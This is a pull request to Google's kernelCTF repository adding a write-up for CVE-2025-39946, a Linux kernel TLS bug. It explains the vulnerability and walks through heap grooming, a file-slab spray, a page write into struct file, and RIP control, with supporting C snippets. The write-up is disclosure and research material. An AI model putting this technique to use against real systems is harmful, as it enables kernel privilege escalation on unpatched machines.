Add kernelCTF CVE-2025-39946 mitigation #295
Open: liona24 wants to merge 2 commits into google:master from liona24:CVE-2025-39946
143 changes: 143 additions & 0 deletions
pocs/linux/kernelctf/CVE-2025-39946_mitigation/docs/exploit.md
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,143 @@ | ||
| # CVE-2025-39946 | ||
|
|
||
| Exploit documentation for `CVE-2025-39946` against `mitigation-v3b-6.1.55`. | ||
|
|
||
| As stated in the `vulnerability.md` documentation, the bug behind | ||
| `CVE-2025-39946` causes use of uninitialized data and potentially out-of-bounds | ||
| accesses. For exploitation we will focus on the uninitialized data in the | ||
| `struct skb_shared_info.frags[]` array. | ||
| TLS manages the first 5 fragments for internal use; fragments after that | ||
| are accessible to us because of the bug described. | ||
| To exploit this, we first groom the heap so that the next fragment holds a | ||
| controlled value. We then try to re-use the page behind this fragment so that | ||
| we can trigger a page write that corrupts kernel data. | ||
|
|
||
| ## Page Write Targets | ||
|
|
||
| With the primitive outlined above (essentially a one-shot use-after-free page | ||
| write primitive), we need to find a useful page to write to. | ||
| There are two obvious choices for this: | ||
| - Page tables | ||
| - Slab backing pages | ||
|
|
||
| At the time of working on the exploit, page tables seemed to be too unstable due | ||
| to the one-shot nature of the write, which is why we will continue with the slab | ||
| backing pages. In hindsight, page tables were probably a good fit too. | ||
|
|
||
| Which slab do we target? Ideally the slab would contain objects that allow | ||
| trivial code execution or other memory write primitives. Additionally, the | ||
| objects for the slab should be allocatable without too much noise in other | ||
| slabs, because we do not want to accidentally corrupt another slab. | ||
| Finally, we need to ensure that the same pages used for the slab can be allocated | ||
| for skb fragments. | ||
|
|
||
| Considering all of the above, I went for `struct file` objects: | ||
| - They can be allocated rather easily by opening files, and we can allocate a | ||
| large number of them. | ||
| - Files are allocated from a dedicated `kmem_cache`, so we are sure to only | ||
| corrupt file objects, which aids stability. | ||
| - Files contain an `f_op` vtable, allowing direct RIP control. | ||
| - File slabs are backed by order 0 pages, which can be allocated easily from | ||
| userspace using pipes. | ||
|
|
||
| One downside of files is the fact that we cannot allocate files without | ||
| allocating inodes too. This is a problem because every file allocation will | ||
| result in the allocation of a `struct dentry`, which essentially means our page | ||
| write might accidentally hit a different slab. | ||
|
|
||
| ## Heap Grooming | ||
|
|
||
| In order to get a fragment at the right position we want to have skbs with 6 | ||
| fragments, so that the last fragment can be picked up by the file slab. | ||
| To get the controlled fragments into an skb, we create pipes and fill exactly 5 | ||
| pages. Pipe buffers are backed by order 0 pages which matches the file slab | ||
| `kmem_cache` order. After that we add another partially filled page which will | ||
| be the page used for triggering the overwrite. | ||
| We then splice those pages onto an skb for the expected fragment layout. | ||
|
|
||
| The final page needs to be partially filled so that there is some space left to | ||
| write. We will fill the page exactly to the alignment of the `struct file` | ||
| objects in the slab. Thus the next write starts at the next `struct file` | ||
| object, and will corrupt all the files in the rest of the slab. | ||
|
|
||
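The alignment arithmetic can be illustrated with a small sketch. The helper names are hypothetical, and the object size is a parameter rather than a known value: the sketch assumes objects are packed back to back from offset 0 of the slab page, which may not hold on every kernel configuration.

```c
#include <stddef.h>

/*
 * Bytes to pre-fill in the last pipe page so that the next write
 * starts exactly at slab object number `first_obj`.
 * Assumption: objects are laid out at a fixed stride of `obj_size`
 * starting at offset 0 of the page.
 */
static size_t prefill_len(size_t obj_size, size_t first_obj)
{
    return obj_size * first_obj;
}

/* Number of whole objects between the pre-fill offset and the page end. */
static size_t objs_overwritten(size_t page_size, size_t obj_size,
                               size_t first_obj)
{
    size_t start = prefill_len(obj_size, first_obj);

    if (obj_size == 0 || start >= page_size)
        return 0;
    return (page_size - start) / obj_size;
}
```

For example, with an assumed 256-byte object stride on a 4096-byte page, pre-filling up to the second object leaves 15 objects in reach of the write.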
| To increase the chance of hitting the right pages, we repeat the above for | ||
| N (= 16) pipes. We fill all of them and then release the skbs one by one, | ||
| immediately picking each up with a new `struct tls_strparser`. Since the last | ||
| freed object will be the first on the freelist, it is very likely that the TLS | ||
| socket picks up the prepared skb. | ||
|
|
||
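The "last freed, first allocated" behaviour this step relies on can be shown with a toy model. This is only an illustration of a LIFO freelist with hypothetical names; the real allocator has per-CPU state and hardening options that this sketch ignores.

```c
#include <stddef.h>

/* Toy object and cache: a singly linked LIFO freelist. */
struct toy_obj {
    struct toy_obj *next;
};

struct toy_cache {
    struct toy_obj *head;
};

/* Freeing pushes the object onto the front of the freelist. */
static void toy_free(struct toy_cache *c, struct toy_obj *o)
{
    o->next = c->head;
    c->head = o;
}

/* Allocating pops from the front, so the most recent free wins. */
static struct toy_obj *toy_alloc(struct toy_cache *c)
{
    struct toy_obj *o = c->head;

    if (o)
        c->head = o->next;
    return o;
}
```

Releasing one skb and allocating right away corresponds to a `toy_free()` directly followed by a `toy_alloc()`, which returns the object that was just freed.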
| ## File Slab Spray | ||
|
|
||
| Now that each TLS socket is readily equipped with a prepared skb, we want to | ||
| spray file slabs so that new slabs will pick up pages that were released from | ||
| the pipe buffers earlier. | ||
| As the files to allocate we choose `signalfd`s. Those are a decent choice | ||
| because they are rather simple and have a small context, so we do not | ||
| allocate new slabs except for the `file` and the `dentry` slab. Furthermore, | ||
| `signalfd`s provide an easy-to-use oracle ([1]) allowing us to check whether we | ||
| corrupted the file structure. | ||
|
|
||
| ```c | ||
| static int do_signalfd4(int ufd, sigset_t *mask, int flags) | ||
| { | ||
| struct signalfd_ctx *ctx; | ||
|
|
||
| /* ... */ | ||
|
|
||
| if (ufd == -1) { | ||
| /* ... */ | ||
| } else { | ||
| struct fd f = fdget(ufd); | ||
| if (!f.file) | ||
| return -EBADF; | ||
| ctx = f.file->private_data; | ||
| if (f.file->f_op != &signalfd_fops) { // [1] | ||
| fdput(f); | ||
| return -EINVAL; | ||
| } | ||
| /* ... */ | ||
| } | ||
| ``` | ||
|
|
||
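From userspace, the check at [1] can be probed by calling `signalfd()` on an existing descriptor. The following is a minimal sketch with a hypothetical helper name, not the code from `exploit.c`; it assumes that `EINVAL` here is caused by the `f_op` comparison, since the mask size and flags passed are valid.

```c
#include <errno.h>
#include <signal.h>
#include <sys/signalfd.h>

/*
 * Hypothetical oracle: returns 0 if the kernel still accepts `fd` as a
 * signalfd, 1 if the f_op check at [1] rejects it (EINVAL), and -1 on
 * any other error (for example EBADF).
 * Side effect: on success the signal mask of the signalfd is replaced.
 */
static int signalfd_looks_corrupted(int fd)
{
    sigset_t mask;

    sigemptyset(&mask);
    sigaddset(&mask, SIGUSR1);

    /* Passing an existing fd takes the `ufd != -1` branch shown above. */
    if (signalfd(fd, &mask, 0) == fd)
        return 0;

    return errno == EINVAL ? 1 : -1;
}
```

A descriptor that was never a signalfd, such as a pipe end, is reported the same way as a corrupted one, which makes the helper easy to try out without the bug.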
| As mentioned earlier we cannot prevent allocation of `dentry` slabs when | ||
| allocating `signalfd`s. To prevent kernel panics because of corrupted `dentry`s | ||
| we will spray the `signalfd`s in a dedicated forked process which will live | ||
| forever in case we fail to find a corrupted file. This way we prevent any | ||
| accidental oops during cleanup. | ||
|
|
||
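The dedicated spray process could look roughly like the sketch below. The function name and the reporting pipe are assumptions made for illustration; the actual exploit may structure the child differently and would perform its checks before parking.

```c
#include <signal.h>
#include <sys/signalfd.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: fork a child that opens `nfds` signalfds and then
 * sleeps forever, so its descriptors are never closed by process cleanup.
 * Returns the number of signalfds the child reports, or -1 on error.
 */
static int spawn_sprayer(int nfds, pid_t *child)
{
    int report[2];
    int opened = -1;
    pid_t pid;

    if (pipe(report) < 0)
        return -1;

    pid = fork();
    if (pid < 0) {
        close(report[0]);
        close(report[1]);
        return -1;
    }

    if (pid == 0) {
        sigset_t mask;
        int count = 0;

        close(report[0]);
        sigemptyset(&mask);
        sigaddset(&mask, SIGUSR1);

        /* Each signalfd allocates one struct file (and one dentry). */
        for (int i = 0; i < nfds; i++)
            if (signalfd(-1, &mask, 0) >= 0)
                count++;

        if (write(report[1], &count, sizeof(count)) != sizeof(count))
            _exit(1);
        close(report[1]);

        /* Never exit: exiting would tear down possibly corrupted objects. */
        for (;;)
            pause();
    }

    close(report[1]);
    if (read(report[0], &opened, sizeof(opened)) != sizeof(opened))
        opened = -1;
    close(report[0]);

    *child = pid;
    return opened;
}
```

Parking the child in `pause()` instead of letting it exit is the point of the design: the kernel never walks the sprayed files during process teardown.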
| ## Triggering the Bug for the Page Write | ||
|
|
||
| Now that we hopefully have a `signalfd` with a file in a slab backed by the page | ||
| we placed into one of the skb fragments, we will trigger the bug as described in | ||
| the `vulnerability.md` document and write our payload for each skb set up. | ||
|
|
||
| For payload choice we will opt for a simple empty file that basically has | ||
| nothing but an `f_op` table that has a `flush` method populated and a reference | ||
| count of 1. When we close the file via `close()` we will reach `filp_close()` | ||
| which gives us RIP control. | ||
| We do not really need a reference count of exactly 1; anything greater than | ||
| zero is enough to bypass the checks in `filp_close()`. It is actually better to | ||
| choose a greater reference count to prevent the file destructor from running. | ||
| Since we will block the kernel in an infinite loop in our flush primitive, we do | ||
| not need to worry about that too much though. | ||
|
|
||
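Building such a payload amounts to writing two fields into an otherwise zeroed object. The sketch below is hedged accordingly: the layout struct and helper are hypothetical, and the field offsets must be taken from the target kernel's `struct file`; no offsets are asserted here.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical description of where the two fields live in the object. */
struct fake_file_layout {
    size_t f_op_off;    /* offset of the f_op pointer (target specific) */
    size_t f_count_off; /* offset of the reference count (target specific) */
    size_t obj_size;    /* size of one slab object */
};

/*
 * Fill `buf` (at least obj_size bytes) with an "empty" file: all zeroes
 * except for the f_op pointer and a non-zero reference count.
 * Returns 0 on success, -1 if a field would not fit into the object.
 */
static int build_fake_file(uint8_t *buf, const struct fake_file_layout *l,
                           uint64_t f_op_addr, uint64_t refcount)
{
    if (l->f_op_off + sizeof(f_op_addr) > l->obj_size ||
        l->f_count_off + sizeof(refcount) > l->obj_size)
        return -1;

    memset(buf, 0, l->obj_size);
    memcpy(buf + l->f_op_off, &f_op_addr, sizeof(f_op_addr));
    memcpy(buf + l->f_count_off, &refcount, sizeof(refcount));
    return 0;
}
```

The address passed as `f_op_addr` would point at a fake `struct file_operations` whose `flush` entry holds the gadget; how that table is placed is described in the following paragraphs.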
| As a RIP gadget we will utilize the "one gadget" technique described in great | ||
| detail in the [CVE-2025-21700 writeup](https://raw.githubusercontent.com/google/security-research/refs/heads/master/pocs/linux/kernelctf/CVE-2025-21700_lts_cos_mitigation/docs/novel-techniques.md). | ||
| Also note that this gadget does not need a KASLR bypass. | ||
|
|
||
| To create the `struct file_operations` pointer we will resort to the previously | ||
| documented deterministically known location of the exception stacks in the CPU | ||
| entry area. This issue has been documented several times (CVE-2023-0597). | ||
|
|
||
| After each write has completed, we check each `signalfd` using the oracle | ||
| described above. If any of them got corrupted, we trigger our payload by | ||
| closing the file descriptor. | ||
|
|
||
| ## Stability Notes | ||
|
|
||
| Special care was taken to make the exploit repeatable if the page reclaim fails. | ||
| It should be close to 80% stable. | ||
| As a side note, the usage of the "one gadget" actually helps with the page | ||
| reclaim because it causes the PCP to drain, thus giving us more reliability in | ||
| the page allocation. | ||
|
|
||
77 changes: 77 additions & 0 deletions
pocs/linux/kernelctf/CVE-2025-39946_mitigation/docs/vulnerability.md
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,77 @@ | ||
| # CVE-2025-39946 | ||
|
|
||
| - Requirements: | ||
| - Kernel configuration CONFIG_TLS | ||
| - Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84c61fe1a75b4255df1e1e7c054c9e6d048da417 | ||
| - Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0aeb54ac4cd5cf8f60131b4d9ec0b6dc9c27b20d | ||
| - Affected Versions: 6.0-rc1 - 6.17-rc7 | ||
| - URL: https://www.cve.org/CVERecord?id=CVE-2025-39946 | ||
|
|
||
| In the kernel TLS implementation an issue was found when processing invalid | ||
| TLS records under network pressure. This behavior can be achieved | ||
| deterministically by forcing short reads via out-of-band data. The kernel | ||
| test case demonstrates this: | ||
|
|
||
| ```c | ||
| TEST_F(tls_err, oob_pressure) | ||
| { | ||
| char buf[1<<16]; | ||
| int i; | ||
|
|
||
| memrnd(buf, sizeof(buf)); | ||
|
|
||
| EXPECT_EQ(send(self->fd2, buf, 5, MSG_OOB), 5); | ||
| EXPECT_EQ(send(self->fd2, buf, sizeof(buf), 0), sizeof(buf)); | ||
| for (i = 0; i < 64; i++) | ||
| EXPECT_EQ(send(self->fd2, buf, 5, MSG_OOB), 5); | ||
| } | ||
| ``` | ||
|
|
||
| The problem manifests in the `tls_strp_copyin_frag` function. After entering | ||
| copy mode due to the initial short read (which is not large enough for parsing | ||
| the TLS message size just yet) and partially receiving the large buffer, we | ||
| continue to copy out chunks from said large buffer. The problem is that TLS | ||
| pre-allocates the `skb_shinfo->frags` for only a fixed (small) TLS record and | ||
| fails to check whether the available fragments are already exhausted ([1]). | ||
| It then continues to copy the incoming data ([2]) regardless. | ||
| Finally, parsing the TLS header in `tls_rx_msg_size` is made to fail, | ||
| returning an invalid size. This causes the copy loop to abort ([3]), but it | ||
| does not abort the full message (the lower-layer TCP receive is not interrupted). | ||
| A following read triggered by other incoming OOB messages forces reentry into | ||
| `tls_strp_copyin_frag`, eventually exhausting the initialized fragments and | ||
| causing reads of uninitialized data or out-of-bounds reads past the | ||
| `skb_shared_info` structure. | ||
| Since fragments are basically raw pages, this indirectly yields a page write | ||
| primitive via uninitialized fragments ([2]) or potentially crafted out-of-bounds | ||
| fragments. | ||
|
|
||
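The effect of the unchecked index at [1] can be modelled in a few lines. This is a userspace model with hypothetical names, not kernel code. It assumes 4 KiB pages, takes the count of 5 TLS-managed fragments from `exploit.md`, and assumes the common default of 17 entries in `frags[]`.

```c
#include <stddef.h>

#define MODEL_PAGE_SIZE  4096u /* assumption: 4 KiB pages */
#define MODEL_INIT_FRAGS 5u    /* per exploit.md: fragments set up by TLS */
#define MODEL_MAX_FRAGS  17u   /* assumption: default size of frags[] */

enum frag_state {
    FRAG_INITIALIZED,   /* one of the fragments TLS prepared */
    FRAG_UNINITIALIZED, /* inside frags[], but never set up */
    FRAG_OUT_OF_BOUNDS  /* past the end of frags[] */
};

/* Mirrors the index computation at [1]: frags[skb->len / PAGE_SIZE]. */
static enum frag_state classify_frag(size_t skb_len)
{
    size_t idx = skb_len / MODEL_PAGE_SIZE;

    if (idx < MODEL_INIT_FRAGS)
        return FRAG_INITIALIZED;
    if (idx < MODEL_MAX_FRAGS)
        return FRAG_UNINITIALIZED;
    return FRAG_OUT_OF_BOUNDS;
}
```

Because `skb->len` keeps growing across re-entries while the header never parses, the index eventually leaves the initialized range, and the copy at [2] then writes through whatever page pointer the stale fragment holds.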
| ```c | ||
| static int tls_strp_copyin_frag(struct tls_strparser *strp, struct sk_buff *skb, | ||
| struct sk_buff *in_skb, unsigned int offset, | ||
| size_t in_len) | ||
| { | ||
| size_t len, chunk; | ||
| skb_frag_t *frag; | ||
| int sz; | ||
|
|
||
| frag = &skb_shinfo(skb)->frags[skb->len / PAGE_SIZE]; // [1] | ||
|
|
||
| len = in_len; | ||
| /* First make sure we got the header */ | ||
| if (!strp->stm.full_len) { | ||
| /* Assume one page is more than enough for headers */ | ||
| chunk = min_t(size_t, len, PAGE_SIZE - skb_frag_size(frag)); | ||
| WARN_ON_ONCE(skb_copy_bits(in_skb, offset, | ||
| skb_frag_address(frag) + | ||
| skb_frag_size(frag), | ||
| chunk)); // [2] | ||
|
|
||
| skb->len += chunk; | ||
| skb->data_len += chunk; | ||
| skb_frag_size_add(frag, chunk); | ||
|
|
||
| sz = tls_rx_msg_size(strp, skb); | ||
| if (sz < 0) | ||
| return sz; // [3] | ||
| /*...*/ | ||
| ``` |
15 changes: 15 additions & 0 deletions
pocs/linux/kernelctf/CVE-2025-39946_mitigation/exploit/mitigation-v3b-6.1.55/Makefile
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,15 @@ | ||
| SRC := exploit.c | ||
|
|
||
| exploit: $(SRC) | ||
| $(CC) -O2 -static -s -Wall -o $@ $^ | ||
|
|
||
| exploit_debug: $(SRC) | ||
| $(CC) -O2 -static -ggdb -Wall -o $@ $^ | ||
|
|
||
| rip: rip.c | ||
| # needs clang to compile | ||
| clang -O3 -o $@ $< | ||
|
|
||
| # apparently this is needed for the CI | ||
| prerequisites: | ||
|
|
Binary file added
BIN
+928 KB
pocs/linux/kernelctf/CVE-2025-39946_mitigation/exploit/mitigation-v3b-6.1.55/exploit
Binary file not shown.
Can you explain how this works?
`vulnerability.md` says that you have an OOB read of uninitialized data. How do we go from that to an out-of-bounds write?
I added more details about the vuln in `vulnerability.md`. Please see if this info is enough. Also note the exploit comments regarding this.